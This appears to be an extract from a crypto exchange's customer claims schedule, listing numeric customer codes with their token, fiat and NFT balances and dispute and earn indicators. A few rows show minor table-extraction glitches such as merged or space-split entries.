| 07419159 | | BAT[1], BF_POINT[100], BRZ[2], CUSDT[5], DOGE[4], ETH[0], ETHW[0], GRT[1], SOL[0], TRX[4], USD[0.01], USDT[0.00003390] | | |
| 07419165 | | CUSDT[2], DOGE[3], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07419169 | | BAT[0], BCH[0], CUSDT[5], DOGE[0], GRT[1.00498957], LINK[0], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[0.15], USDT[0] | Yes | |
| 07419171 | | USD[0.00] | | |
| 07419172 | | DOGE[.98], SOL[.0072], USD[2.00], USDT[0] | | |
| 07419179 | | BTC[.0358], ETH[1.01405], SOL[1.35687716], USD[0.18] | | |
| 07419180 | | BAT[0], BTC[0], DOGE[0], ETH[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00008033] | | |
| 07419181 | | BRZ[1], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07419182 | | DOGE[3270.79307931], USD[0.00] | | |
| 07419183 | | CUSDT[3], USD[0.00] | | |
| 07419184 | | CUSDT[11], DOGE[53.29047133], GRT[1], USD[0.00], USDT[0] | | |
| 07419190 | | BTC[0], USD[0.01], USDT[0.00000001] | | |
| 07419195 | | DOGE[1], USD[0.00] | Yes | |
| 07419203 | | BTC[0], ETH[0.00029348], ETHW[0.00029347], SUSHI[0.42292330], USD[2.75] | | |
| 07419207 | | BTC[.00092776], DOGE[1261.69112832], TRX[1], USD[0.00] | | |
| 07419208 | | BTC[.01678028], CUSDT[6], DOGE[4.00014101], ETH[.00000001], ETHW[.00000001], GRT[2], TRX[3], USD[0.00], USDT[1] | | |
| 07419218 | | USD[0.01] | Yes | |
| 07419221 | | GRT[101.898], LTC[.00273266], USD[0.74] | | |
| 07419222 | | GRT[4.94047103], USD[0.00] | Yes | |
| 07419223 | | AAVE[0], ETH[0], ETHW[0], GRT[0], SUSHI[0], USD[1.43] | | |
| 07419227 | | CUSDT[1], USD[0.01] | | |
| 07419230 | | GRT[2.997], LINK[.03186126], SOL[5.994], USD[0.68] | | |
| 07419231 | | CUSDT[1], DOGE[1], SOL[6.71453043], TRX[1], USD[0.00] | | |
| 07419233 | | BAT[1.35833793], BRZ[2], BTC[.03287898], CUSDT[25], DOGE[1953.84197294], ETH[.22311077], ETHW[.22290065], KSHIB[250.91279985], LINK[.52245843], LTC[.51961232], MATIC[7.39611288], MKR[.00428546], SHIB[42756.78791712], SOL[.06307060], SUSHI[1.45981498], TRX[603.72453965], UNI[1.07572963], USD[0.00] | Yes | |
| 07419235 | | BTC[.00008799], CUSDT[660.03767979], DAI[4.95470566], TRX[99.14389248], USD[0.00], USDT[.99510349] | | |
| 07419249 | | CUSDT[2], DOGE[1160.95031974], SHIB[5219077.50774671], TRX[3197.63341765], USD[0.17] | Yes | |
| 07419253 | | DOGE[.478], SOL[.0444], SUSHI[1095.96], TRX[22929.993], USD[3.12] | | |
| 07419256 | | DOGE[1], SHIB[2927519.32523324], USD[0.00], USDT[0] | Yes | |
| 07419260 | | USD[0.01] | | |
| 07419263 | | DOGE[1], UNI[0], USD[0.00] | Yes | |
| 07419264 | | AAVE[0], ALGO[0.00722699], AUD[0.00], BAT[0], BCH[0], BTC[0], CUSDT[8], DAI[0], DOGE[2], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[83.56902364], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0], USDT[0], YFI[0] | Yes | |
| 07419273 | | DOGE[992.22370531], USD[0.00] | | |
| 07419279 | | BAT[3], BRZ[5], CUSDT[13], DOGE[.00000584], ETH[.00000002], ETHW[.00000002], GRT[5], LTC[.00056936], TRX[8], USD[0.00], USDT[8] | | |
| 07419280 | | BRZ[1], BTC[0], DOGE[20.80639624], GRT[7.53462919], LINK[2.60885286], NFT (31730974254843289/Warriors 75th Anniversary Icon Edition Diamond #1692)[1], SOL[12.06365259], SUSHI[6.22520048], USD[0.00] | Yes | |
| 07419283 | | USD[5.51] | Yes | |
| 07419286 | | DOGE[1326.98105104], TRX[1], USD[0.00] | Yes | |
| 07419289 | | NFT (367256297683490347/Coachella x FTX Weekend 1 #13332)[1] | | |
| 07419291 | | BCH[0], USD[0.00] | | |
| 07419297 | | DOGE[878.99608737], ETH[0], SHIB[5], USD[17.00], USDT[0] | | |
| 07419298 | | BRZ[0.07912071], BTC[0], SHIB[4], TRX[1], USD[0.01], YFI[0] | Yes | |
| 07419299 | | CUSDT[2], USD[0.00] | | |
| 07419301 | | BRZ[.23356168], DAI[.01968947], DOGE[2.01419868], GRT[.26229765], USD[0.14] | | |
| 07419304 | | BRZ[2], CUSDT[15], DOGE[1311.72207833], GRT[20.59677395], SUSHI[2.06372818], TRX[206.48228052], UNI[2.01062282], USD[0.45] | | |
| 07419312 | | BAT[1.0165555], BRZ[1], BTC[.01563151], CUSDT[17], DOGE[1914.60419534], ETH[.0689312], ETHW[.06807521], GRT[1.00498957], LTC[1.4264155], SHIB[1429624.68792679], TRX[4], USD[55.21], USDT[1.10393971] | Yes | |
| 07419316 | | BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07419322 | | CUSDT[675.78795865], DOGE[616.20502489], GRT[29.55313685], TRX[269.77140866], USD[0.00] | Yes | |
| 07419323 | | MATIC[6.63830173], USD[0.00] | | |
| 07419326 | | CUSDT[1], DOGE[222.39409826], USD[3.20] | | |
| 07419330 | | BTC[0.00000287], GRT[.568], TRX[.659], USD[0.26] | | |
| 07419335 | | BAT[1], UNI[1], USD[0.69] | | |
| 07419337 | | AVAX[0], BTC[0], ETH[0], NEAR[.0495], NFT (339575199880027759/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #8)[1], NFT (455807844829195386/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #11)[1], NFT (493868603326402001/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #10)[1], SOL[0.00000001], TRX[0.73937500], USD[0.61], USDT[0.00002975] | | |
| 07419341 | | BRZ[2], BTC[.02038403], CUSDT[5], TRX[312.76772687], USD[0.02] | | |
| 07419345 | | USD[9.87] | | |
| 07419347 | | DOGE[5], USD[0.00] | | |
| 07419352 | | USD[0.00] | | |
| 07419353 | Contingent, Disputed | USDT[0] | | |
| 07419354 | | NFT (442097931986194572/Humpty Dumpty #130)[1] | | |
| 07419356 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07419357 | | SOL[82.917], USD[16.30] | | |
| 07419360 | | DOGE[1], ETH[0.02919399], ETHW[0.02919399] | | |
| 07419363 | | USD[0.46], USDT[.19598] | | |
| 07419364 | | DOGE[1], SHIB[337899.54337899], TRX[2816.15257751], UNI[2.47485401], USD[0.00] | | |
| 07419367 | | DOGE[28.64037806], USD[0.00], USDT[0] | | |
| 07419370 | | CUSDT[1], DOGE[371.02230877], ETH[.01123914], ETHW[.01123914], USD[0.00] | | |
| 07419373 | | CUSDT[1], DOGE[1], USD[70.78] | | |
| 07419374 | | BTC[0], DAI[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07419375 | | BTC[.01101973], USD[0.00] | | |
| 07419376 | | BCH[.001321], BTC[0.00007815], DOGE[2.947], ETH[.003316], ETHW[.003316], LINK[.0361], TRX[1.435001], USD[0.00], USDT[0] | | |
| 07419377 | | CUSDT[2], DOGE[4586.27676936], SHIB[2540352.59924892], USD[0.00] | | |
| 07419378 | | USD[50.00], USDT[.002] | | |
| 07419379 | | DOGE[18.981], USD[0.01], USDT[0] | | |
| 07419380 | | NFT (574018081001879649/FTX - Off The Grid Miami #5949)[1] | | |
| 07419386 | | CUSDT[1], ETH[.23135919], ETHW[.23135919], USD[0.00] | | |
| 07419392 | | BRZ[2], CUSDT[4], DOGE[1], SHIB[6219657.82458741], TRX[1], USD[0.00] | Yes | |
| 07419400 | | DOGE[74.59422654], USD[0.00] | | |
| 07419401 | | ETH[1.14], ETHW[1.14] | | |
| 07419403 | | BAT[1], BRZ[1], CUSDT[19], DOGE[922.03240257], KSHIB[38265.99870886], SHIB[46995573.26022336], SOL[5.81673129], TRX[6], USD[51.08] | Yes | |
| 07419406 | | SOL[0], USD[0.01], USDT[0.00000023] | | |
| 07419410 | | SOL[.107], USD[0.54] | | |
| 07419413 | | TRX[1766.69019571], USD[0.00] | | |
| 07419418 | | CUSDT[1], DOGE[1], SHIB[11], SOL[.00006569], TRX[4.1485874], USD[47.09] | Yes | |
| 07419426 | | BTC[0], USD[0.00], USDT[0.00000001] | | |
| 07419430 | | BRZ[4], CUSDT[3], DOGE[80.53830669], TRX[4], USD[0.00] | Yes | |
| 07419433 | | ALGO[0], BF_POINT[400], ETH[0], ETHW[0], MATIC[0], NFT (424030149686718635/FTX - Off The Grid Miami #832)[1], NFT (472112973713851535/Entrance Voucher #3283)[1], NFT (554202473195430147/Humpty Dumpty #270)[1], USD[0.00], USDT[0] | Yes | |
| 07419436 | | BTC[.0000971], USD[2.55] | | |
| 07419441 | | ALGO[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], MATIC[0], SHIB[5145.81342138], SOL[0], SUSHI[0], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07419446 | | CUSDT[1], SOL[0] | | |
| 07419451 | | CUSDT[1], USD[0.00] | | |
| 07419452 | | USD[0.00] | | |
| 07419454 | | BTC[0], DOGE[0], KSHIB[17.67709016], PAXG[0], SOL[0], SUSHI[0], USD[0.00], YFI[0] | Yes | |
| 07419466 | | USD[7.83] | | |
| 07419470 | | DOGE[36.5228978], USD[0.00] | | |
| 07419471 | | ETH[0], USD[0.00] | | |
| 07419472 | | EUR[0.00] | | |
| 07419473 | | BAT[2.10754852], BRZ[4], BTC[.15772768], CUSDT[55.31538681], DOGE[875.49001642], ETH[3.1504944], ETHW[3.14914243], NFT (535835286111870937/Coachella x FTX Weekend 1 #29457)[1], SOL[31.7759475], SUSHI[36.6133673], TRX[10.08279101], USD[4.87] | Yes | |
| 07419475 | | DOGE[3], ETH[.00026385], ETHW[.00026385], TRX[2], USD[0.00] | | |
| 07419498 | | BTC[0], GRT[0], USD[0.00] | | |
| 07419504 | | USD[0.69] | | |
| 07419505 | | CUSDT[4], SHIB[3], USD[0.00] | | |
| 07419511 | | USD[0.00] | | |
| 07419512 | | BAT[1], CUSDT[1], TRX[3890.36077118], USD[0.00] | Yes | |
| 07419518 | | CUSDT[1], DOGE[7091.42035848], SHIB[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07419525 | | DOGE[1182.18320053], TRX[1], USD[74.54] | | |
| 07419529 | | USD[0.00] | | |
| 07419534 | | CUSDT[3], DOGE[.00002311], ETH[0], ETHW[0], TRX[.0000479], USD[0.59] | | |
| 07419536 | | BRZ[1], BTC[.01317753], CUSDT[1], DOGE[43.10636644], USD[0.00] | Yes | |
| 07419538 | | BAT[2.12371125], BRZ[5.07952967], CUSDT[9], DOGE[108.7710191], GRT[4.2480819], SUSHI[1.10543274], TRX[6], USD[0.00], USDT[2.21147145] | Yes | |
| 07419540 | | BRZ[58.93154281], BTC[.00033584], CUSDT[495.56680098], USD[0.00] | | |
| 07419542 | | DOGE[177.04621638] | | |
| 07419544 | | CUSDT[4], ETH[.24986056], ETHW[.24966904], LINK[17.49986099], TRX[17276.96850986], USD[0.00] | Yes | |
| 07419554 | | USD[0.00] | | |
| 07419558 | | BRZ[1], CUSDT[3], DOGE[638.28395944], USD[0.00] | Yes | |
| 07419564 | | BAT[2], GRT[1], TRX[1], USD[5.48] | | |
| 07419565 | | ETHW[1.07203], NFT[314001103444847113/Golden Hill #149][1], NFT[374748438319832978/Warriors 75th Anniversary Icon Edition Diamond #2109][1], NFT[427653169447683942/Golden Hill #72][1], NFT[487708375085324171/2974 Floyd Norman - CLE 5-0051][1], USD[7.22] | | |
| 07419568 | | SHIB[143359110.60562258], USD[0.00] | Yes | |
| 07419575 | | BTC[0], DOGE[0], LINK[0], SOL[0], TRX[684.01531166], USD[0.00], USDT[0.00000008] | | |
| 07419576 | | USD[0.00], USDT[3.5161616] | | |
| 07419580 | | BAT[1], BTC[0], CUSDT[1], SOL[0] | | |
| 07419585 | | DOGE[7168.62045429], USD[0.00] | Yes | |
| 07419587 | | CUSDT[1], DOGE[48963.68610369], USD[1.39] | Yes | |
| 07419595 | | BAT[0], BRZ[0.00004661], BTC[0.00008001], ETH[0], USD[0.00], USDT[0.00001392] | | |
| 07419597 | | BAT[2], BRZ[1], BTC[.35208596], CUSDT[1], DOGE[1], ETH[6.69396636], ETHW[6.69396636], NFT[306283780160750855/You in, Miami? #67][1], TRX[2], USD[0.00], USDT[1] | | |
| 07419598 | | BAT[4.18933239], BRZ[6.20539838], BTC[0.00000183], DOGE[349697.55896037], ETH[.00050609], ETHW[.00050609], GRT[5.17659987], SHIB[3], SOL[14.12719549], SUSHI[1.05475248], TRX[2.52887482], USD[0.00], USDT[0] | Yes | |
| 07419600 | | USD[0.02] | Yes | |
| 07419607 | | BRZ[1], CUSDT[5], DOGE[1], TRX[1], USD[0.00] | | |
| 07419608 | | USD[0.00] | | |
| 07419609 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | Yes | |
| 07419613 | | CUSDT[1], SHIB[1], SOL[8.44791552], USD[1.75] | Yes | |
| 07419620 | | CUSDT[.00154885], DOGE[0], ETH[0.00000001], ETHW[0], MATIC[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07419623 | | USD[11.03], USDT[.00767561] | | |
| 07419624 | | BRZ[2], CUSDT[5], DOGE[2], TRX[2], USD[0.00] | | |
| 07419626 | | ETH[.893795], ETHW[.893795], GRT[668.872], SHIB[1298700], SOL[75.73395], USD[11.07] | | |
| 07419628 | | BTC[.00005711], TRX[1], USD[21.48] | | |
| 07419631 | | USD[450.00] | | |
| 07419632 | | BTC[.00367921], USD[50.00] | | |
| 07419639 | | BRZ[.00002807], BTC[0], DAI[.00008679], ETH[.00002129], ETHW[.00002129], GRT[.2578056], LINK[.01436854], USD[1.03], USDT[0.00416298] | | |
| 07419643 | | BAT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07419649 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07419652 | | BTC[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07419653 | | ETH[.00738092], ETHW[.00738092] | | |
| 07419657 | | BTC[.00500987], CUSDT[3], DOGE[193.60106093], USD[0.01] | | |
| 07419664 | | SOL[0.00560400], USD[0.58], USDT[0] | | |
| 07419666 | | MATIC[.91], SOL[.00645434], USD[971.14] | | |
| 07419670 | | BRZ[1], BTC[0], DOGE[0], ETH[0], GRT[1], TRX[2] | | |
| 07419673 | | BAT[0], CUSDT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07419677 | | BTC[0], ETH[0], LINK[0], MATIC[0], SOL[0] | | |
| 07419684 | | DOGE[1593.01900838], TRX[1], USD[0.00] | | |
| 07419685 | | ALGO[.00249719], AVAX[12.63961021], BRZ[3], BTC[.02383468], CUSDT[4], DOGE[8.00921072], ETH[.00000001], ETHW[1.21468845], LINK[.00010489], NFT[338654571842595327/Ravager #974][1], NFT[352284586987724213/Gloom Punk #8864][1], NFT[361188776817081539/Ravager #623][1], NFT[369900763142188303/Gloom Punk #8157][1], NFT[400024582003437910/Gloom Punk #8807][1], NFT[503127880228752990/Ravager #101][1], NFT[506514293693828007/Ravager #1639][1], NFT[514748999716310030/Roamer #952][1], NFT[536419096719586489/Gloom Punk #3533][1], SHIB[33], TRX[1], USD[0.00], USDT[1.05813839] | Yes | |
| 07419688 | | BTC[.0877476], USD[21.65] | | |
| 07419691 | | BTC[.00003517], CUSDT[252.81458146], DOGE[136.94341274], LTC[.04254979], USD[0.00] | Yes | |
| 07419693 | | CUSDT[4], TRX[2], USD[0.01] | | |
| 07419694 | | BAT[458.648], ETH[.0025], ETHW[1.089909], NFT[467402738337250281/Entrance Voucher #29764][1], USD[0.22], USDT[1.75915814] | | |
| 07419702 | | BTC[.08072579], USD[4.94] | | |
| 07419706 | | SHIB[1], USD[0.00] | | |
| 07419710 | | DOGE[132.3764375], USD[0.00] | | |
| 07419712 | | BTC[.00001342] | | |
| 07419715 | | BRZ[1], CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00], USDT[0] | | |
| 07419719 | | CUSDT[6], GRT[1.00498957], SOL[.00027491], TRX[4], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07419721 | Contingent, Disputed | DOGE[1], TRX[1], USD[0.44] | | |
| 07419724 | Contingent, Disputed | BRZ[1], DOGE[1], SOL[0], USD[302.55], USDT[1] | | |
| 07419725 | | BAT[110.26658047], CUSDT[6], DOGE[10964.70623176], USD[24.30] | Yes | |
| 07419727 | | AVAX[0], BTC[0], ETH[0], ETHW[0.00009305], MATIC[0], SOL[0], USD[0.00] | | |
| 07419731 | | CUSDT[2], DOGE[2], SHIB[209216.72302249], USD[0.00] | | |
| 07419736 | Contingent, Disputed | DOGE[1], TRX[1], USD[0.65] | | |
| 07419738 | | BTC[0], USD[2.28] | | |
| 07419739 | | BTC[.00000115], CUSDT[4], DOGE[.88480645], ETH[.00009786], ETHW[.00009786], LINK[.00422569], TRX[8], USD[0.71] | | |
| 07419745 | | NEAR[5.0997], USD[0.03] | | |
| 07419751 | | ETH[.005], ETHW[.005] | | |
| 07419753 | | CUSDT[4], DOGE[4612.03488378], SOL[15.10785693], SUSHI[8.10165466], TRX[1], USD[0.00] | | |
| 07419755 | | USDT[0.00000001] | | |
| 07419758 | | CUSDT[0], TRX[1], USD[0.00] | | |
| 07419760 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07419761 | | BAT[0], BTC[0], CUSDT[2], DOGE[0], PAXG[0], SOL[0], TRX[0], USD[0.00], YFI[0] | Yes | |
| 07419765 | | BTC[0], ETH[0], ETHW[.0004481], SOL[0], USD[0.00], USDT[0] | | |
| 07419769 | | USD[0.00] | | |
| 07419771 | | USD[0.00] | | |
| 07419773 | | BTC[0.04417580], DOGE[2463.92224632], SOL[13.14137082], USD[0.32] | | |
| 07419776 | | BTC[0.00007135], ETH[.0495], SOL[0], USD[0.00] | | |
| 07419777 | | BTC[.00004922], GRT[300], SOL[36.04371021], USD[0.00] | | |
| 07419779 | | LTC[0], SOL[0.00725232], SUSHI[0], USD[0.79], YFI[0] | | |
| 07419788 | | TRX[.000002], USD[0.01], USDT[4.49027564] | | |
| 07419792 | | USD[19.96] | | |
| 07419794 | | USD[11.34] | | |
| 07419798 | | BRZ[2], CUSDT[4], GRT[2.08194429], SHIB[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07419802 | | CUSDT[3], DOGE[1], SHIB[1], TRX[1], USD[0.00] | | |
| 07419803 | | BRZ[2.87552783], BTC[.00093022], CUSDT[2831.56090642], DOGE[6336.02309143], ETH[.08555562], ETHW[.08452418], LTC[.98687591], MATIC[65.54712435], SHIB[2149098.84296401], SUSHI[8.26425012], TRX[7886.47175833], USD[53.93], USDT[0] | Yes | |
| 07419805 | | USD[16.736] | | |
| 07419809 | | CUSDT[2], DOGE[4.01396673], ETH[4.34120497], ETHW[4.33948572], SHIB[11072.11626012], SOL[166.87806729], TRX[3], USD[0.00] | Yes | |
| 07419810 | | CUSDT[21], ETHW[.23655551], GRT[4.12121909], SHIB[6], USD[1891.24], USDT[0] | Yes | |
| 07419813 | | LTC[.00856], SUSHI[.396], USD[1.88], USDT[.0053536] | | |
| 07419829 | | BTC[.00516147], CUSDT[12], DOGE[10608.68586734], ETH[.1240297], ETHW[.12286417], TRX[5549.76283369], USD[0.83] | Yes | |
| 07419833 | | ETH[.00014006], USD[0.00] | Yes | |
| 07419834 | | ETH[.04475516], ETHW[.04419802], GRT[2.04561753], SOL[13.49327543], USD[0.00] | Yes | |
| 07419836 | | BTC[0], DOGE[0], ETH[0], SOL[0.00065160], USD[0.00], USDT[0] | | |
| 07419839 | | TRX[1], USD[0.00] | | |
| 07419841 | | BAT[2.01329641], BRZ[1], CUSDT[4], DOGE[1612.75668462], ETH[.11875307], ETHW[.11760603], GRT[1], SHIB[2], SOL[24.53007021], USDNG[185.14380416], TRX[2], USD[653.50], USDT[1.02164642] | Yes | |
| 07419843 | | BAT[1], BRZ[1], BTC[.02513564], CUSDT[1], DOGE[3], ETH[.18489481], ETHW[.18489481], TRX[3], USD[0.00] | | |
| 07419844 | | DOGE[342.0291099], TRX[2], USD[0.12] | | |
| 07419847 | | BTC[0] | | |
| 07419849 | | SOL[8], USD[0.01] | | |
| 07419851 | | SUSHI[1.28749004] | | |
| 07419860 | | CUSDT[10], DOGE[3], SOL[0], TRX[1] | Yes | |
| 07419873 | | DOGE[407.6124], SUSHI[28.924], USD[2.64] | | |
| 07419874 | | BF_POINT[300], BTC[0], ETH[0], USD[666.23] | | |
| 07419875 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07419887 | | BAT[2], BRZ[3], CUSDT[2], DOGE[.00006026], TRX[1], USD[0.01] | | |
| 07419889 | | BTC[0], SOL[.00000001], USDT[0] | | |
| 07419890 | Contingent, Disputed | DOGE[1], USD[0.33] | | |
| 07419895 | | CUSDT[2], DOGE[963.69997521], USD[0.00] | | |
| 07419898 | | BTC[0], ETH[0], ETHW[0], SOL[0], SUSHI[0], USDT[0] | | |
| 07419900 | | BTC[0.00003482], ETH[.000652], ETHW[.000652], SUSHI[.968], USDT[1.93884697] | | |
| 07419906 | | CUSDT[1], DOGE[0], TRX[.08691291], USD[0.00], USDT[0] | Yes | |
| 07419907 | Contingent, Disputed | BRZ[1], DOGE[1], USD[0.63] | | |
| 07419912 | | BTC[.00089205], DOGE[88.91545], USD[6.75] | | |
| 07419916 | | CUSDT[1], GRT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07419917 | | LINK[1.65907862], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07419926 | | BRZ[0], TRX[0], USD[0.00] | | |
| 07419941 | | USD[0.01] | | |
| 07419942 | | CUSDT[1], DOGE[.00003367], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07419944 | | CUSDT[4], DOGE[1], TRX[249.77708595], USD[0.01] | Yes | |
| 07419946 | | MATIC[5], SOL[.00656993], USD[0.00] | | |
| 07419948 | | ETH[0], MATIC[0], SOL[0] | | |
| 07419952 | | USD[0.01], USDT[0] | Yes | |
| 07419955 | | BRZ[1], BTC[0], ETH[0], ETHW[0.73352540], LINK[0], SOL[0], USD[90.68], USDT[0] | Yes | |
| 07419960 | | CUSDT[1], USD[0.00] | | |
| 07419964 | | USD[0.13] | | |
| 07419965 | | BF_POINT[300], BTC[0], DOGE[0], LTC[0], SOL[0.00000001], USD[0.00], USDT[0] | | |
| 07419967 | | DOGE[100.92000001], ETH[.00014734], ETHW[.00014734], TRX[.24], USD[1119.90] | | |
| 07419969 | | DOGE[.468], ETH[.000776], ETHW[.850776], SOL[.00744757], USD[2876.42], USDT[.00824] | | |
| 07419973 | | GRT[2.997], TRX[61.752], USD[0.68] | | |
| 07419974 | | BTC[.00011048], USD[0.00] | | |
| 07419981 | | USD[0.00] | | |
| 07419982 | | GRT[2], USD[0.00], USDT[0.00001388] | | |
| 07419984 | | CUSDT[1], TRX[1], USD[0.83] | | |
| 07419986 | | BTC[0], ETH[0], MATIC[0], SOL[0], USD[0.00], WBTC[0] | | |
| 07419987 | | BTC[0], ETH[0], ETHW[0], LINK[0], MATIC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07419989 | | BTC[.00322912], GRT[.744], SOL[65.5164], USD[2.72] | | |
| 07419992 | | BTC[0.00000521], DOGE[243.832], TRX[43.81357085], USD[20.43] | | |
| 07419998 | | USD[0.00] | | |
| 07420000 | | BTC[.21635031], CUSDT[4], DOGE[12830.49106296], ETH[.00000349], ETHW[.00000349], GRT[1.00407193], LINK[1.10047581], SHIB[1], SOL[1.10047581], TRX[2], USD[0.00] | Yes | |
| 07420008 | | CUSDT[1], DOGE[453.83884679], TRX[2560.50846321], USD[0.00] | Yes | |
| 07420014 | | BRZ[1], CUSDT[4], DOGE[12830.49106296], ETH[.00000349], ETHW[.00000349], GRT[1.00407193], LINK[1.10047581], SHIB[1], SOL[1.10047581], TRX[2], USD[0.00] Yes<br>BRZ[1], NFT (2920783385110810851/CryptoAvatar #162/)[1], NFT (2999591179272710022/DDD Yandom #19)[1], NFT (3119497875455513843/My Little Gang #31)[1], NFT (3165190128142705 1/DDD #48)[1], NFT (3321830586730991143/Vox World #19)[1], NFT (3359483256716258322/Halloween edition #6)[1], NFT (3454017073852026228/Dream Land #17/)[1], NFT (3742252892877582330/Mad Lions Remastered #8)[1], NFT (4020210340033140556/Echo #3)[1], NFT (4046575342505943560/Pop Art #5)[1], NFT (4114204096286635578/Dragon Avatar #48)[1], NFT (4145264156135108822/Dragon Avatar #41)[1], NFT (4327105879602239191/CryptoAvatar #128)[1], NFT (4396283897424572268/DDD 'monster #13)[1], NFT (4445040995363933730/Our World #047)[1], NFT (4476049791620582232/Echo #10)[1], NFT (4488172552049516022/Mad Girl Series #12)[1], NFT (4689555315378043011/My Habitat #02)[1], NFT (4805131813447857611/Crypto Banger #001)[1], NFT (4860165669688433731/Dragon Avatar #24)[1], NFT (4979009131866425211/CryptoAvatar #135)[1], NFT (5025685249638151981/Dragon Avatar #36)[1], NFT (5032456458780010521/CryptoAvatar #161)[1], NFT (5167541367033727961/drawme)[1], NFT (5428115626855944301/Squid Game Special Edition)[1], NFT (5530667809179088881/Ninja Turtles #2)[1], NFT (5580480462755503311/Chillin' with my Gnomies Series)[1], NFT (5718075942070901178/CryptoAvatar #178)[1], SHIB[2], SOL[23.2138454], SUSHI[264.87092275], TRX[2], USD[0.00] | | |
| 07420016 | | USD[0.00] | | |
| 07420020 | | SOL[0], TRX[0], USD[0.54], USDT[0] | | |
| 07420023 | | ETH[0], SUSHI[0] | | |
| 07420030 | | BRZ[1], BTC[.20678804], DOGE[2], GRT[1], MATIC[0], NFT (3189740067076991 00/Surreal World #11)[1], NFT (3533227260858085 17/Anime #49)[1], NFT (3769758367630989 64/Got Gas #2)[1], NFT (3807341698752472824/Anywhere )[1], NFT (3907654331881943 26/Glamis )[1], NFT (4331202784579424 03/27 Classic )[1], NFT (4513535950851540 32/Tiki bar)[1], NFT (4666298320545622 77/Wing #2)[1], NFT (4747364013998859 29/That face )[1], NFT (5269299429180323 33/Welcome let's drink )[1], SHIB[31562445 5.39336260], SOL[25.87877374], SUSHI[65.35519707], TRX[1072.70594987], UNI[22.72035847], USD[0.00] | Yes | |
| 07420032 | | BTC[0], DOGE[0], ETH[0], MATIC[0], SOL[0], TRX[.000304], USD[0.00], USDT[0] | | |
| 07420035 | | BTC[0.00039603], CUSDT[3], ETH[0.00528310], ETHW[0.00521470], SOL[8.67749463], USD[24.46] | Yes | |
| 07420036 | | GRT[2.40816672], USD[0.00] | | |
| 07420037 | | SOL[4.05127496], SUSHI[3.984], USD[0.00] | | |
| 07420058 | | DOGE[1], LINK[0] | | |
| 07420062 | | CUSDT[1], DOGE[195.07022821], USD[0.00] | | |
| 07420066 | | BRZ[1], DOGE[38314.30911697], TRX[1], USD[0.00] | | |
| 07420071 | | DOGE[0], SUSHI[0], USD[1.25], USDT[0.00800000] | | |
| 07420072 | | BTC[.00000007], DOGE[7.33083139], USD[0.00], USDT[0] | | |
| 07420082 | | BAT[1], CUSDT[1], ETH[1.15298869], ETHW[1.15298869], USD[0.01] | | |
| 07420083 | | USDT[17.859974] | | |
| 07420084 | | BTC[.00009203], USD[0.00] | | |
| 07420090 | | USD[250.00] | | |
| 07420093 | | SOL[.0004], SUSHI[.002], USD[0.00] | | |
| 07420097 | | SOL[.06] | | |
| 07420100 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07420102 | | BAT[1.0165555], BRZ[1], CUSDT[1], DOGE[0], TRX[0.00052793], USD[0.01] | Yes | |
| 07420104 | | USD[0.00] | | |
| 07420105 | | DOGE[14.48111206], TRX[1], USD[0.00] | | |
| 07420107 | | BTC[0], SOL[0], USD[36.15] | | |
| 07420110 | | CUSDT[1], DOGE[91.07034085], ETH[.0269938], ETHW[.0269938], TRX[1], USD[0.00] | | |
| 07420118 | | CUSDT[1], LTC[.00000007], TRX[2], USD[1.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07420120 | | DOGE[0], ETH[0], ETHW[0], SHIB[12694.64354212], USD[0.00], USDT[0] | Yes | |
| 07420121 | | DOGE[176.45768606], ETH[.00553445], ETHW[.00553445], USD[0.00] | | |
| 07420124 | | ETHW[.76826945], LINK[22.678435], USD[894.02], USDT[0.00000001] | | |
| 07420126 | | BTC[0], ETH[.76104534], ETHW[.00008226], USD[2.10] | | |
| 07420132 | | CUSDT[1], DOGE[2], LINK[.33008252], USD[0.00] | | |
| 07420134 | | BRZ[2], CUSDT[1], DOGE[1083.45431909], TRX[1], USD[37.74] | | |
